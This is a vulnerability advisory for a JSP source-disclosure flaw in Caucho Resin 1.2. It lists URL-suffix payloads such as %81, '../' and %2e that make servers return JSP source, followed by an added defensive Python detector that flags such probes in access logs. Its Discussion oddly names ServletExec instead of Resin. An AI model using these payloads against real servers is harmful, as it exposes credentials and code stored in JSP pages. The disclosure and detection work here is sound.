Caucho Technology Resin 1.2 JSP Source Disclosure Vulnerability
BID:1986
Info
| Bugtraq ID: | 1986 |
| Class: | Input Validation Error |
| CVE: | CVE-2000-1224 |
| Remote: | Yes |
| Local: | Yes |
| Published: | Nov 23 2000 12:00AM |
| Updated: | Mar 19 2015 09:21AM |
| Credit: | Discovered and submitted by email on Nov 23, 2000 benjurry <[email protected]>. |
| Vulnerable: | Caucho Resin 1.2 |
| Not Vulnerable: | |
Discussion
Resin is a servlet and JSP engine that supports Java and JavaScript.
ServletExec will return the source code of JSP files when certain characters are appended to the requested URL: the request no longer matches the JSP handler, yet the underlying filesystem still resolves it to the .jsp file, which is then served as plain text. Which characters trigger this depends on the platform Resin is running on.
Successful exploitation could lead to the disclosure of sensitive information contained within JSP pages, such as database credentials or application logic.
Exploit / POC
The following exploit has been provided by benjurry <[email protected]>:
Apache (Win32):
- ..
- %2e..
- %81
- %82
Example: http://target/filename.jsp%81
Resin Web Server:
- ../
Example: http://target/filename.jsp../
IIS 5, requesting the URL encoded with ASCII:
- '%2e' instead of '.'
Example: http://target/filename%2ejsp
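All three platform variants above exploit the same gap: the container decides whether a request goes to the JSP engine by looking at the raw request URI's extension, while the filesystem normalises the name and opens the real .jsp file anyway. The following Python is an added example (not from the advisory, from Caucho, or from benjurry) of the defensive check that closes that gap: it canonicalises the request path approximately the way the affected platforms do, flags any request that would not be dispatched as JSP but still resolves to a .jsp file, and runs the same check over a constructed access-log sample to find past attempts. The function names, the normalisation rules, and the log lines are my own assumptions modelled on the character lists above.

```python
# Added example (not part of the original advisory): path-canonicalisation
# check against the JSP source-disclosure patterns listed above, usable as a
# front-end filter rule and as a scan over access logs. Names are my own.
import re
from urllib.parse import unquote_to_bytes

JSP_EXT = ".jsp"

# Common Log Format: the request line is the quoted field. Assumed layout.
LOG_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (not real traffic); three are probes.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Nov/2000:10:01:02 +0000] "GET /login.jsp HTTP/1.0" 200 1312
10.0.0.5 - - [23/Nov/2000:10:01:09 +0000] "GET /login.jsp%81 HTTP/1.0" 200 2048
10.0.0.7 - - [23/Nov/2000:10:02:11 +0000] "GET /images/logo.png HTTP/1.0" 200 5120
10.0.0.5 - - [23/Nov/2000:10:02:40 +0000] "GET /admin/users.jsp../ HTTP/1.0" 200 4096
10.0.0.9 - - [23/Nov/2000:10:03:15 +0000] "GET /login%2ejsp?next=/ HTTP/1.0" 200 2048
"""


def canonical_path(raw_path: str) -> str:
    """Approximate the file the server's filesystem will open for a request path.

    Rules assumed from the advisory's character lists:
    - percent-decoding turns %2e into '.', so /x%2ejsp -> /x.jsp
    - bytes >= 0x80 (the %81 / %82 cases) are dropped from the name
    - a trailing run of '.' and '/' ('..', '%2e..', '../') is stripped,
      since the name resolves to the same file without it
    """
    path_only = raw_path.split("?", 1)[0]
    decoded = unquote_to_bytes(path_only)
    ascii_only = bytes(b for b in decoded if b < 0x80).decode("ascii")
    return re.sub(r"[./]+$", "", ascii_only)


def is_disclosure_attempt(raw_path: str) -> bool:
    """True when the raw URI would bypass JSP dispatch (it does not end in
    .jsp) but canonicalises to a .jsp file. A filter should reject these."""
    raw = raw_path.split("?", 1)[0].lower()
    canon = canonical_path(raw_path).lower()
    return (not raw.endswith(JSP_EXT)) and canon.endswith(JSP_EXT)


def flag_log(log_text: str) -> list:
    """Return the request targets in log_text that match the probe pattern."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_disclosure_attempt(m.group("target")):
            hits.append(m.group("target"))
    return hits


if __name__ == "__main__":
    for target in flag_log(SAMPLE_LOG):
        print("source-disclosure probe:", target, "->", canonical_path(target))
```

The check is deliberately conservative: a request such as /index.jsp/ is flagged as well, because the safe rule is that the raw URI and its canonical form must agree on whether the target is a JSP, and any disagreement is sent back as an error rather than handed to the static-file handler.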
References
References:
- Caucho Technology Homepage (Caucho Technology)